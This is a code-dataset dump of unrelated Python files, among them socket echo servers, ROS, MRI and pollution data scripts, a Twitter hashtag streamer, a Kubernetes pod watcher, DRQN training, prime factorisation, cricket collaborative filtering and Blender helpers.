data = conn.recv(1024)\n data = \"ECHO: \" + data.decode(\"utf-8\")\n conn.sendall(data.encode(\"utf-8\"))\n conn.close()\n\n\ndef handle_udp(s):\n while True:\n msg, address = s.recvfrom(1024)\n msg = \"ECHO: \" + msg.decode(\"utf-8\")\n s.sendto(bytes(msg, \"utf-8\"), address)\n\n\nwith open(\"conf.conf\") as file:\n lines = file.readlines()\n conf = dict()\n for line in lines:\n param = line.split(':')\n conf[param[0]] = param[1][:-1]\n\nIP = conf[\"ip\"]\nPORT_SERVER = int(conf[\"port-s\"])\nchoice = conf[\"type\"]\n\nif choice == \"T\":\n print(\"TCP mode\")\n sock_type = socket.SOCK_STREAM\n handler = handle_tcp\nelse:\n print(\"UDP mode\")\n sock_type = socket.SOCK_DGRAM\n handler = handle_udp\n\ns = socket.socket(socket.AF_INET, sock_type)\n\ntry:\n s.bind((IP, PORT_SERVER))\nexcept:\n print(\"Bind error!\")\n\nhandler(s)\ns.close()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"85904963","text":"#! /usr/bin/env python\nimport math\nimport rospy\n\nfrom geometry_msgs.msg import Pose\nfrom cob_cartesian_controller.msg import Profile\nimport simple_cartesian_interface as sci\n\nif __name__ == '__main__':\n rospy.init_node('test_move_circ_interface')\n\n pose = sci.gen_pose(pos=[0.0, 0.7, 1.0], rpy=[0.0, 0.0, 0.0])\n start_angle = 0.0 * math.pi / 180.0\n end_angle = 90.0 * math.pi / 180.0\n profile = Profile()\n profile.vel = 0.2\n profile.accl = 0.1\n #profile.profile_type = Profile.SINOID\n profile.profile_type = Profile.RAMP\n\n success, message = sci.move_circ(pose, \"world\", start_angle, end_angle, 0.3, profile)\n if success:\n rospy.loginfo(message)\n else:\n rospy.logerr(message)\n","sub_path":"cob_cartesian_controller/scripts/test_move_circ_interface.py","file_name":"test_move_circ_interface.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"30212212","text":"#!/bin/python3\n\n# Author: David SB Lee\n# First Compiled: 02/08/18\n# Purpose: Extract T1w voxel intensities by coordinate\n\n# Things to change when runing on different data set\n\t# 1. all paths\n\t# 2. all splits\n\nimport nibabel as nib\nimport glob\n\n# Set global variables (paths)\npath = \"/path/to/T1w.niig.gz\"\n\nif __name__ == \"__main__\":\n\t# Put the images in a list\n\tfiles = sorted(glob.glob(file))\n\n\t# Create a list of subject numbers\n\tsubNumList = [file.split('/')[4] for file in files]\n\t# If you don't want to use list comprehension\n\tsubNumList = []\n\tfor file in files:\n\t\tsubNum = file.split('/')[8]\n\t\tsubNumList.append(subNum)\n\t# If you want to add a label to the list\n\tsubNumList.insert(0, 'SubjectID')\n\t\n\t# Put voxel coordinates and inetnsities in a separate\n\tfor file in files:\n\n\t\t# Load T1w as nibabel image\n\t\timg = nib.load(file)\n\t\tdata = img.get_data()\n\n\t\t# Check data dimensions\n\t\timg.shape\n\t\tdata.shape\n\n\t\tintensity_list= []\n\t\tcoordinate_list = []\n\n\t\t# Start extratcion\n\t\tfor i in range(img.shape[0]):\n\t\t\tfor j in range(img.shape[1]):\n\t\t\t\tfor k in range(img.shape[2]):\n\t\t\t\t\tx = str(i + 1)\n\t\t\t\t\ty = str(j + 1)\n\t\t\t\t\tz = str(k + 1)\n\t\t\t\t\teach_coordinate = (x,y,z)\n\t\t\t\t\teach_coordinate = \" \".join(each_coordinate)\n\t\t\t\t\tcoordinate_list.append(each_coordinate)\n\t\t\t\t\tintensity_list.append(data[i][j][k])\n\t\t\t\t\tprint (each_coordinate, data[i][j][k])\n","sub_path":"tools/nibabel/extract_T1w_voxels_nibabel.py","file_name":"extract_T1w_voxels_nibabel.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"461993970","text":"import numpy as np\r\nimport numpy.ma as ma\r\n\r\ndata = np.zeros((365,25))\r\n\r\n\r\n#污染物观测 NO2,SO2,O3,PM25,PM10,CO(mg/m3)\r\np_obs = np.load('D:/project/data/pollutant/obs/p_obs_daily.npy')\r\np_obs = p_obs[132:140,113:121,:,:] #(8, 8, 365, 6)\r\np_obs = ma.masked_array(p_obs, p_obs == -999.) \r\np_obs = np.mean(p_obs,axis=(0,1)) #(365, 6)\r\np_obs[0,0]= 49\r\np_obs[0,1]= 23\r\np_obs[0,2]= 29\r\np_obs[0,3]= 41\r\np_obs[0,4]= 66\r\np_obs[0,5]= 1.09\r\n\r\n\r\n#污染物模拟 PM25,PM10,SO2,NO2,O3,CO(mg/m3)\r\np_sim = np.load('D:/project/data/pollutant/cmaq/p_sim_daily.npy')\r\np_sim = p_sim[132:140,113:121,:,:] #(8, 8, 365, 6)\r\np_sim = ma.masked_array(p_sim, p_sim == -999.) \r\np_sim = np.mean(p_sim,axis=(0,1)) #(365, 6)\r\n\r\n \r\n#气象观测 PRE,RH,WSPD,WDIR,TEM\r\nmete_obs = np.load('D:/project/data/mete/obs/cma/m_obs_daily.npy')\r\nmete_obs = mete_obs[132:140,113:121,:,:] #(8, 8, 365, 6)\r\nmete_obs = ma.masked_array(mete_obs, mete_obs == -999.) \r\nmete_obs = np.mean(mete_obs,axis=(0,1)) #(365, 6)\r\nmete_obs[324,2] = 1.31 #注意:11/21日的数据有问题,改为1.31\r\n\r\n#气象模拟 RH,TEM,PBLH,SOL_RAD,PRE,WSPD,WDIR\r\nmete_sim = np.load('D:/project/data/mete/cmaq/m_sim_daily.npy')\r\nmete_sim = mete_sim[132:140,113:121,:,:] #(8, 8, 365, 6)\r\nmete_sim = ma.masked_array(mete_sim, mete_sim == -999.) \r\nmete_sim = np.mean(mete_sim,axis=(0,1)) #(365, 6)\r\n\r\n\r\ndata[:,0] = (p_sim[:,0] - p_obs[:,3]) #PM2.5_Bias\r\ndata[:,1] = (p_sim[:,1] - p_obs[:,4]) #PM10_Bias\r\ndata[:,2] = (p_sim[:,3] - p_obs[:,0]) #NO2_Bias\r\ndata[:,3] = (p_sim[:,2] - p_obs[:,1]) #SO2_Bias\r\ndata[:,4] = (p_sim[:,4] - p_obs[:,2]) #O3_Bias\r\ndata[:,5] = (p_sim[:,5] - p_obs[:,5]) #CO_Bias\r\ndata[:,6] = p_obs[:,3] #PM2.5_Obs\r\ndata[:,7] = p_obs[:,4] #PM10_Obs\r\ndata[:,8] = p_obs[:,0] #NO2_Obs\r\ndata[:,9] = p_obs[:,1] #SO2_Obs\r\ndata[:,10] = p_obs[:,2] #O3_Obs\r\ndata[:,11] = p_obs[:,5] #CO_Obs\r\ndata[:,12] = p_sim[:,0] #PM2.5_Sim\r\ndata[:,13] = (mete_sim[:,0] - mete_obs[:,1]) #RH_Bias\r\ndata[:,14] = (mete_sim[:,1] - mete_obs[:,4]) #TEM_Bias\r\ndata[:,15] = (mete_sim[:,5] - mete_obs[:,2]) #WSPD_Bias\r\n\r\nfor i in range(365): #WDIR_Bias\r\n WDIR_Bias = np.abs(mete_sim[i,6] - mete_obs[i,3])\r\n if WDIR_Bias > 180.: \r\n data[i,16] = 360. - WDIR_Bias \r\n else:\r\n data[i,16] = WDIR_Bias\r\n\r\ndata[:,17] = (mete_sim[:,4] - mete_obs[:,0]) #PRE_Bias\r\ndata[:,18] = mete_obs[:,1] #RH_Obs\r\ndata[:,19] = mete_obs[:,4] #TEM_Obs\r\ndata[:,20] = mete_obs[:,2] #WSPD_Obs\r\ndata[:,21] = mete_obs[:,3] #WDIR_Obs\r\ndata[:,22] = mete_obs[:,0] #PRE_Obs\r\ndata[:,23] = mete_sim[:,2] #PBLH_Sim\r\ndata[:,24] = mete_sim[:,3] #SOLRAD_Sim\r\ndata = np.around(data, 2) #都保留2位小数\r\n#np.savetxt(\"D:/project/data/beijing/dataset.csv\", data, delimiter=',')\r\nnp.save(\"D:/project/data/beijing/dataset_abs.npy\", data)","sub_path":"beijing/dataset_abs.py","file_name":"dataset_abs.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"360836489","text":"import json\nimport logging\nimport socket\n\nimport requests\nimport requests_oauthlib\n\nconsumer_key = ''\nconsumer_secret = ''\naccess_token = ''\naccess_secret = ''\n\nauth = requests_oauthlib.OAuth1(consumer_key,\n consumer_secret,\n access_token,\n access_secret,\n signature_type='auth_header')\n\n\ndef get_tweets_filter(track='', locations: tuple = ()):\n # streaming requests doc:\n # http://docs.python-requests.org/en/master/user/advanced/#streaming-requests\n\n url = 'https://stream.twitter.com/1.1/statuses/filter.json?'\n data = f'track={track}'\n query_url = url + data\n\n response = requests.get(query_url, auth=auth, stream=True)\n\n return response\n\n\ndef send_hashtags_data_server(response, connection):\n\n for line in response.iter_lines():\n if line:\n decoded_line = line.decode('utf-8')\n tweet_json = json.loads(decoded_line)\n # tweet_text = tweet_json['text']\n\n tweet_hashtags = tweet_json['entities']['hashtags']\n if tweet_hashtags:\n for hashtag in tweet_hashtags:\n\n hashtag_text = hashtag['text']\n connection.send(hashtag_text.encode('utf-8') + b'\\n')\n logging.info(f'Sent hashtag:\\n{hashtag_text}\\n=======')\n\n\ndef create_data_server_connection():\n\n host = 'localhost'\n port = 4040\n\n # make a TCP socket object\n socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # bind it to server port number\n socket_obj.bind((host, port))\n socket_obj.listen()\n\n logging.info(\"Waiting for TCP connection...\")\n\n return socket_obj.accept()\n\n\n\nif __name__ == '__main__':\n\n # set up logging\n logging.getLogger().setLevel(\n level=logging.INFO\n )\n\n # create data server connection\n connection, address = create_data_server_connection()\n\n logging.info(\"Connected. Receiving tweets.\")\n tweet_stream = get_tweets_filter(track='FelizJueves')\n send_hashtags_data_server(tweet_stream, connection)\n","sub_path":"hashtags.py","file_name":"hashtags.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"152544035","text":"#!/usr/bin/python3\n################################################################################\n# HPCC SYSTEMS software Copyright (C) 2019 HPCC Systems®.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\n\nimport os.path\nimport signal\nimport sys\nimport time\nimport datetime\nfrom kubernetes import client, config, watch\n\ndef signal_handler(signum, frame):\n sys.exit(0)\n\ndef current_time():\n ts = time.time()\n return datetime.datetime.fromtimestamp(ts).strftime('%Y%m%d_%H:%M:%S')\n\ndef main():\n # Configs can be set in Configuration class directly or using helper\n # utility. If no argument provided, the config will be loaded from\n # default location.\n #config.load_kube_config()\n config.load_incluster_config()\n\n v1 = client.CoreV1Api()\n current_namespace = open(\"/var/run/secrets/kubernetes.io/serviceaccount/namespace\").read()\n\n event_log = \"/tmp/pod_events.log\"\n if os.path.exists(event_log):\n os.remove(event_log)\n\n event_err = \"/tmp/pod_events_error.log\"\n if os.path.exists(event_err):\n os.remove(event_err)\n\n config_log = \"/tmp/hpcc_config.log\"\n if os.path.exists(config_log):\n os.remove(config_log)\n\n not_ready_list = []\n resource_version=0;\n while True:\n\n #print(\"Wait for events ...\")\n #f_event = open (event_log, 'a')\n #f_event.write(\"%s - Wait for events ... \\n\" % (current_time()))\n #f_event.write(\"Number of not ready pods: %d\\n\" % (len(not_ready_list)))\n #f_event.close()\n w = watch.Watch()\n try:\n new_running_list = []\n f_event = open (event_log, 'a')\n for event in w.stream(v1.list_namespaced_pod, namespace=current_namespace, timeout_seconds=5, resource_version=resource_version):\n #print(\"Event: %s %s %s %s\" % (event['type'],event['object'].kind, event['object'].metadata.name, event['object'].status.phase))\n f_event.write(\"%s - Event: %s %s %s %s\\n\" % (current_time(),event['type'],event['object'].kind, event['object'].metadata.name, event['object'].status.phase))\n #print(\"Resource_version: %s\" % (event['object'].metadata.resource_version))\n if int(resource_version) < int(event['object'].metadata.resource_version):\n resource_version = event['object'].metadata.resource_version\n pod_name = event['object'].metadata.name\n state = event['object'].status.phase\n if (pod_name.startswith('dali') or\n pod_name.startswith('esp') or\n pod_name.startswith('thor') or\n pod_name.startswith('thor_roxie') or\n pod_name.startswith('roxie') or\n pod_name.startswith('eclcc') or\n pod_name.startswith('scheduler') or\n pod_name.startswith('backup') or\n pod_name.startswith('sasha') or\n pod_name.startswith('dropzone') or\n pod_name.startswith('support') or\n pod_name.startswith('spark') or\n pod_name.startswith('ldap') or\n pod_name.startswith('node')):\n\n if state == 'Running':\n if pod_name not in new_running_list:\n new_running_list.append(pod_name)\n if pod_name in not_ready_list:\n not_ready_list.remove(pod_name)\n else:\n if pod_name not in not_ready_list:\n not_ready_list.append(pod_name)\n\n f_event.close()\n #print(\"not_ready_list size: %d, new_running_list size: %d\" % (len(not_ready_list), len(new_running_list)))\n if len(not_ready_list) == 0 and len(new_running_list) > 0:\n # Configure and restart HPCC cluster\n #print(\"/opt/hpcc-tools/config_hpcc.sh\")\n cmd = \"/opt/hpcc-tools/config_hpcc.sh > \" + config_log + \" 2>&1\"\n os.system(cmd)\n\n except Exception as e:\n #print(e)\n f_error = open (event_err, 'a')\n f_error.write(str(e))\n f_error.close()\n\n\nif __name__ == '__main__':\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n main()\n","sub_path":"legacy/deployment/admin/hpcc-tools/kube/events_watcher.py","file_name":"events_watcher.py","file_ext":"py","file_size_in_byte":4879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"270364230","text":"\"\"\"An example of training a Deep Recurrent Q-Network (DRQN).\n\nDRQN is a DQN with a recurrent Q-network, described in\nhttps://arxiv.org/abs/1507.06527.\n\nTo train DRQN for 50M timesteps on Breakout, run:\n python train_drqn_ale.py --recurrent\n\nTo train DQRN using a recurrent model on flickering 1-frame Breakout, run:\n python train_drqn_ale.py --recurrent --flicker --no-frame-stack\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\nfrom builtins import * # NOQA\nfrom future import standard_library\nstandard_library.install_aliases() # NOQA\nimport argparse\nimport functools\nimport os\nimport sys\n\nimport chainer\nfrom chainer import functions as F\nfrom chainer import links as L\nimport gym\nimport gym.wrappers\nimport numpy as np\n\nimport chainerrl\nfrom chainerrl.action_value import DiscreteActionValue\nfrom chokozainerrl import experiments\nfrom chokozainerrl import tools\nfrom chainerrl import explorers\nfrom chainerrl import misc\nfrom chainerrl import replay_buffer\n\nfrom chainerrl.wrappers import atari_wrappers\n\n\ndef make_args(argstr):\n parser = argparse.ArgumentParser()\n parser.add_argument('--mode', type=str, default='check')\n parser.add_argument('--env', type=str, default='BreakoutNoFrameskip-v4')\n parser.add_argument('--outdir', type=str, default='results')\n parser.add_argument('--gpu', type=int, default=0)\n parser.add_argument('--load-agent', type=str, default=None)\n parser.add_argument('--log-type',type=str,default=\"full_stream\")\n parser.add_argument('--save-mp4',type=str,default=\"test.mp4\")\n\n parser.add_argument('--steps', type=int, default=5 * 10 ** 7)\n parser.add_argument('--step-offset', type=int, default=0)\n parser.add_argument('--checkpoint-frequency', type=int,default=None)\n parser.add_argument('--max-frames', type=int,default=30 * 60 * 60) # 30 minutes with 60 fps\n parser.add_argument('--eval-interval', type=int, default=250000)\n parser.add_argument('--eval-n-steps', type=int, default=125000)\n\n parser.add_argument('--seed', type=int, default=0)\n parser.add_argument('--final-exploration-frames',type=int, default=10 ** 6)\n parser.add_argument('--final-epsilon', type=float, default=0.01)\n parser.add_argument('--eval-epsilon', type=float, default=0.001)\n parser.add_argument('--replay-start-size', type=int, default=5 * 10 ** 4)\n parser.add_argument('--target-update-interval',type=int, default=10 ** 4)\n parser.add_argument('--update-interval', type=int, default=4)\n parser.add_argument('--batch-size', type=int, default=32)\n parser.add_argument('--lr', type=float, default=2.5e-4)\n parser.add_argument('--render', action='store_true', default=False)\n parser.add_argument('--monitor', action='store_true', default=False)\n\n parser.add_argument('--recurrent', action='store_true', default=False)\n parser.add_argument('--flicker', action='store_true', default=False)\n parser.add_argument('--no-frame-stack', action='store_true', default=False)\n parser.add_argument('--episodic-update-len', type=int, default=10)\n\n myargs = parser.parse_args(argstr)\n return myargs\n\ndef main(args):\n import logging\n logging.basicConfig(level=logging.INFO, filename='log')\n\n if(type(args) is list):\n args=make_args(args)\n if not os.path.exists(args.outdir):\n os.makedirs(args.outdir)\n\n # Set a random seed used in ChainerRL.\n misc.set_random_seed(args.seed, gpus=(args.gpu,))\n\n # Set different random seeds for train and test envs.\n train_seed = args.seed\n test_seed = 2 ** 31 - 1 - args.seed\n\n def make_env(test):\n # Use different random seeds for train and test envs\n env_seed = test_seed if test else train_seed\n env = atari_wrappers.wrap_deepmind(\n atari_wrappers.make_atari(args.env, max_frames=args.max_frames),\n episode_life=not test,\n clip_rewards=not test,\n flicker=args.flicker,\n frame_stack=not args.no_frame_stack,\n )\n env.seed(int(env_seed))\n if test:\n # Randomize actions like epsilon-greedy in evaluation as well\n env = chainerrl.wrappers.RandomizeAction(env, args.eval_epsilon)\n if args.monitor:\n env = gym.wrappers.Monitor(\n env, args.outdir,\n mode='evaluation' if test else 'training')\n if args.render:\n env = chainerrl.wrappers.Render(env)\n return env\n\n env = make_env(test=False)\n eval_env = make_env(test=True)\n print('Observation space', env.observation_space)\n print('Action space', env.action_space)\n\n n_actions = env.action_space.n\n if args.recurrent:\n # Q-network with LSTM\n q_func = chainerrl.links.StatelessRecurrentSequential(\n L.Convolution2D(None, 32, 8, stride=4),\n F.relu,\n L.Convolution2D(None, 64, 4, stride=2),\n F.relu,\n L.Convolution2D(None, 64, 3, stride=1),\n functools.partial(F.reshape, shape=(-1, 3136)),\n F.relu,\n L.NStepLSTM(1, 3136, 512, 0),\n L.Linear(None, n_actions),\n DiscreteActionValue,\n )\n # Replay buffer that stores whole episodes\n rbuf = replay_buffer.EpisodicReplayBuffer(10 ** 6)\n else:\n # Q-network without LSTM\n q_func = chainer.Sequential(\n L.Convolution2D(None, 32, 8, stride=4),\n F.relu,\n L.Convolution2D(None, 64, 4, stride=2),\n F.relu,\n L.Convolution2D(None, 64, 3, stride=1),\n functools.partial(F.reshape, shape=(-1, 3136)),\n L.Linear(None, 512),\n F.relu,\n L.Linear(None, n_actions),\n DiscreteActionValue,\n )\n # Replay buffer that stores transitions separately\n rbuf = replay_buffer.ReplayBuffer(10 ** 6)\n\n # Draw the computational graph and save it in the output directory.\n fake_obss = np.zeros(env.observation_space.shape, dtype=np.float32)[None]\n if args.recurrent:\n fake_out, _ = q_func(fake_obss, None)\n else:\n fake_out = q_func(fake_obss)\n chainerrl.misc.draw_computational_graph(\n [fake_out], os.path.join(args.outdir, 'model'))\n\n explorer = explorers.LinearDecayEpsilonGreedy(\n 1.0, args.final_epsilon,\n args.final_exploration_frames,\n lambda: np.random.randint(n_actions))\n\n opt = chainer.optimizers.Adam(1e-4, eps=1e-4)\n opt.setup(q_func)\n\n def phi(x):\n # Feature extractor\n return np.asarray(x, dtype=np.float32) / 255\n\n agent = chainerrl.agents.DoubleDQN(\n q_func,\n opt,\n rbuf,\n gpu=args.gpu,\n gamma=0.99,\n explorer=explorer,\n replay_start_size=args.replay_start_size,\n target_update_interval=args.target_update_interval,\n update_interval=args.update_interval,\n batch_accumulator='mean',\n phi=phi,\n minibatch_size=args.batch_size,\n episodic_update_len=args.episodic_update_len,\n recurrent=args.recurrent,\n )\n\n if args.load_agent:\n agent.load(args.load_agent)\n\n if (args.mode=='train'):\n experiments.train_agent_with_evaluation(\n agent=agent, env=env, steps=args.steps,\n checkpoint_freq=args.checkpoint_frequency,\n step_offset=args.step_offset,\n eval_n_steps=args.eval_n_steps,\n eval_n_episodes=None,\n eval_interval=args.eval_interval,\n outdir=args.outdir,\n eval_env=eval_env,\n log_type=args.log_type\n )\n elif (args.mode=='check'):\n return tools.make_video.check(env=env,agent=agent,save_mp4=args.save_mp4)\n\n elif (args.mode=='growth'):\n return tools.make_video.growth(env=env,agent=agent,outdir=args.outdir,max_num=args.max_frames,save_mp4=args.save_mp4)\n","sub_path":"chokozainerrl/train_drqn_ale.py","file_name":"train_drqn_ale.py","file_ext":"py","file_size_in_byte":7926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"623831936","text":"\n#from sand import top_level_import\n#assert top_level_import(__name__, 'sand.forgot_import', args=('logic error',))\n\n\n#from sand import frozendict\nfrom seed.types.FrozenDict import FrozenDict as frozendict\nfrom .min_factor import min_factor as n2min_factor\nfrom .numberss import NumberList\nfrom ..smalls import divides\nfrom ..integer.CertificatedPrime import \\\n CertificatedPrime, find_primitive_root\n\n\n'''\nn2factors = [None, frozendict()]\n\ndef get_n2factors_least_len(L):\n n2min_factor = min_factor.get_least_len(L)\n for n in range(len(n2factors), L):\n assert len(n2factors) == n\n \n p = n2min_factor[n]\n assert divides(p, n)\n if p < n:\n p, = n2factors[p].keys() # int to CertificatedPrime\n p2exp = dict(n2factors[n//p])\n p2exp.setdefault(p, 0)\n p2exp[p] += 1\n n2factors.append(frozendict(p2exp))\n else:\n assert p == n\n root = find_primitive_root(p, p-1, n2factors[p-1])\n p_ = CertificatedPrime(n2factors[p-1], root)\n assert p_ == p\n p = p_\n n2factors.append(frozendict({p:1}))\n return n2factors\n\n\n\n\n\nfrom pprint import pprint\npprint(get_n2factors_least_len(10))\n'''\n\n\nclass CertificatedFactors(NumberList):\n def _calc_pos(self, n, nums):\n n2factors = nums\n assert len(n2factors) == n\n \n p = n2min_factor(n) # __call__ not __index__\n assert divides(p, n)\n if p < n:\n p, = n2factors[p].keys() # int to CertificatedPrime\n p2exp = dict(n2factors[n//p])\n p2exp.setdefault(p, 0)\n p2exp[p] += 1\n result = frozendict(p2exp)\n #n2factors.append(frozendict(p2exp))\n else:\n assert p == n\n root = find_primitive_root(p, p-1, n2factors[p-1])\n p_ = CertificatedPrime(n2factors[p-1], root)\n assert p_ == p\n p = p_\n result = frozendict({p:1})\n #n2factors.append(frozendict({p:1}))\n return result\n raise NotImplementedError()\n def __init__(self):\n super().__init__([None, frozendict()])\n\n\n\nn2factors = certificated_factors = CertificatedFactors()\n\n_data = [None, {}, {2:1}, {3:1}, {2:2}, {5:1}, {2:1,3:1},\n {7:1}, {2:3}, {3:2}, {2:1,5:1}, {11:1}, {2:2,3:1}]\n\nassert n2factors.get_first(len(_data)) == _data\n\n\n\n\n\n\n \n \n","sub_path":"nn_ns/math_nn/numbers/certificated_factors.py","file_name":"certificated_factors.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"488978729","text":"listaNum = list()\nlistaPares = list()\nlistaImpares = list()\n\nwhile True:\n num = int(input('Digite um número: '))\n listaNum.append(num)\n if num % 2 == 0:\n listaPares.append(num)\n else:\n listaImpares.append(num)\n resp = str(input('Deseja continuar[S/N]? ')).lower()\n if resp == 'n':\n break\nlistaPares.sort()\nlistaImpares.sort()\nlistaNum.sort()\nprint(f'Lista de todos os números digitados: {listaNum}')\nprint(f'Lista apenas com os valores ímpares digitados: {listaImpares}')\nprint(f'Lista apenas com os valores pares digitados: {listaPares}')","sub_path":"Exercicios/Estruturas Compostas/Ex082.py","file_name":"Ex082.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"131422170","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\"\"\"\nCollaborative Filtering Classification Example.\n\"\"\"\nfrom __future__ import print_function\n\nfrom pyspark import SparkContext\nimport sys\n\n# $example on$\nfrom pyspark.mllib.recommendation import ALS, MatrixFactorizationModel, Rating\n# $example off$\n\nif __name__ == \"__main__\":\n fp = open(\"./data/p\"+str(sys.argv[1])+\"_pred.csv\", \"w+\")\n batsman = open(\"./data/batsman_index.csv\", \"r\")\n bowler = open(\"./data/bowler_index.csv\", \"r\")\n\n sc = SparkContext(appName=\"PythonCollaborativeFilteringExample\")\n # $example on$\n # Load and parse the data\n data = sc.textFile(\"./data/p\"+str(sys.argv[1])+\".csv\")\n batsmen = {}\n b1 = {}\n batsmen_index = 0\n bowlers = {}\n b2 = {}\n bowlers_index =0\n for line in data.collect():\n line = line.split(',')\n if(line[0] not in list(batsmen.values())):\n batsmen[batsmen_index] = line[0]\n b1[line[0]] = batsmen_index\n batsmen_index+=1\n\n if(line[1] not in list(bowlers.values())):\n bowlers[bowlers_index] = line[1]\n b2[line[1]] = bowlers_index\n bowlers_index+=1\n\n \n \n ratings = data.map(lambda l: l.split(','))\\\n .map(lambda l: Rating(b1[l[0]], b2[l[1]], float(l[2].rstrip('\\n'))))\n\n # Build the recommendation model using Alternating Least Squares\n rank = 10\n numIterations = 10\n model = ALS.train(ratings, rank, numIterations)\n\n\n bat1 = open(\"Team1bats.csv\", \"r\")\n bat2 = open(\"Team2bats.csv\", \"r\")\n bowl1 = open(\"Team1bowl.csv\", \"r\")\n bowl2 = open(\"Team2bowl.csv\", \"r\")\n x = y = []\n for line in bowl1:\n x.append(b2[line.rstrip('\\n')])\n for line in bat1:\n y.append(b1[line.rstrip('\\n')])\n for i in x:\n for j in y:\n p = model.predict(j,i)\n print(batsmen[j]+','+bowlers[i]+','+str(p))\n fp.write(batsmen[j]+','+bowlers[i]+','+str(p)+'\\n')\n x = y = []\n for line in bowl2:\n x.append(b2[line.rstrip('\\n')])\n for line in bat2:\n y.append(b1[line.rstrip('\\n')])\n for i in x:\n for j in y:\n p = model.predict(j,i)\n print(batsmen[j]+','+bowlers[i]+','+str(p))\n fp.write(batsmen[j]+','+bowlers[i]+','+str(p)+'\\n')\n\n \n # Evaluate the model on training data\n # testdata = ratings.map(lambda p: (p[0], p[1]))\n # predictions = model.predictAll(testdata).map(lambda r: ((r[0], r[1]), r[2]))\n # ratesAndPreds = ratings.map(lambda r: ((r[0], r[1]), r[2])).join(predictions)\n # for item in predictions.collect():\n # print(item)\n # fp.write(batsmen[item[0][0]]+','+bowlers[item[0][1]]+',' + str(item[1])+'\\n')\n\n # MSE = ratesAndPreds.map(lambda r: (r[1][0] - r[1][1])**2).mean()\n # print(\"Mean Squared Error = \" + str(MSE))\n\n # Save and load model\n model.save(sc, \"models/target\"+str(sys.argv[1])+\"/tmp/myCollaborativeFilter\")\n sameModel = MatrixFactorizationModel.load(sc, \"models/target\"+str(sys.argv[1])+\"/tmp/myCollaborativeFilter\")\n # $example off$\n","sub_path":"src/probcalc/CollaborativeFiltering/CFPrediction.py","file_name":"CFPrediction.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"185860033","text":"\"\"\"Standalone helper functions.\"\"\"\n\nimport contextlib\nfrom typing import Dict, List, Union\n\nimport bpy\n\nfrom ..lib import logger\nfrom . import pipeline\n\n\ndef imprint(node: bpy.types.bpy_struct_meta_idprop, data: Dict):\n r\"\"\"Write `data` to `node` as userDefined attributes\n\n Arguments:\n node: Long name of node\n data: Dictionary of key/value pairs\n\n Example:\n >>> import bpy\n >>> def compute():\n ... return 6\n ...\n >>> bpy.ops.mesh.primitive_cube_add()\n >>> cube = bpy.context.view_layer.objects.active\n >>> imprint(cube, {\n ... \"regularString\": \"myFamily\",\n ... \"computedValue\": lambda: compute()\n ... })\n ...\n >>> cube['avalon']['computedValue']\n 6\n \"\"\"\n\n imprint_data = dict()\n\n for key, value in data.items():\n if value is None:\n continue\n\n if callable(value):\n # Support values evaluated at imprint\n value = value()\n\n if not isinstance(value, (int, float, bool, str, list)):\n raise TypeError(f\"Unsupported type: {type(value)}\")\n\n imprint_data[key] = value\n\n pipeline.metadata_update(node, imprint_data)\n\n\ndef lsattr(attr: str,\n value: Union[str, int, bool, List, Dict, None] = None) -> List:\n r\"\"\"Return nodes matching `attr` and `value`\n\n Arguments:\n attr: Name of Blender property\n value: Value of attribute. If none\n is provided, return all nodes with this attribute.\n\n Example:\n >>> lsattr(\"id\", \"myId\")\n ... [bpy.data.objects[\"myNode\"]\n >>> lsattr(\"id\")\n ... [bpy.data.objects[\"myNode\"], bpy.data.objects[\"myOtherNode\"]]\n\n Returns:\n list\n \"\"\"\n\n return lsattrs({attr: value})\n\n\ndef lsattrs(attrs: Dict) -> List:\n r\"\"\"Return nodes with the given attribute(s).\n\n Arguments:\n attrs: Name and value pairs of expected matches\n\n Example:\n >>> lsattrs({\"age\": 5}) # Return nodes with an `age` of 5\n # Return nodes with both `age` and `color` of 5 and blue\n >>> lsattrs({\"age\": 5, \"color\": \"blue\"})\n\n Returns a list.\n\n \"\"\"\n\n # For now return all objects, not filtered by scene/collection/view_layer.\n 